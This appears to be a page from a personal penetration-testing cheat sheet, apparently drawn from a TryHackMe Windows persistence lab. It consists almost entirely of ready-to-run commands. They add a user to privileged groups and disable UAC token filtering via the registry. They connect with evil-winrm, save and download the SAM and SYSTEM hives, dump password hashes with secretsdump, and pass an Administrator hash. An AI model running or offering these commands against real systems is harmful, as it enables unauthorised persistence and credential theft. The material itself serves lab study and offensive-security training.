☣️Persistance

$ net localgroup administrators thmuser0 /add $ net localgroup "backup operators" thmuser0 /add $ net localgroup "Remote Management Users" thmuser1 /add $ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 ... to add local user to local admin group (or Backup Ops) and allow RDP and disable UAC

$ evil-winrm -i 10.10.116.75 -u thmuser1 -p Password321 ... to connect via WinRM

$ reg save hklm\system system.bak $ reg save hklm\sam sam.bak $ download system.bak $ download sam.bak ... to get hashes with Evil-WinRM

$ impackt-secretsdump -sam sam.bak -system system.bak LOCAL ... to dump hashes from hive

$ evil-winrm -i 10.10.116.75 -u Administrator -H f3118544a831e728781d780cfdb9c1fa ... to pass the hash with Evil-WinRM

PreviousData Exfiltration NextReverse Shells

Last updated 2 years ago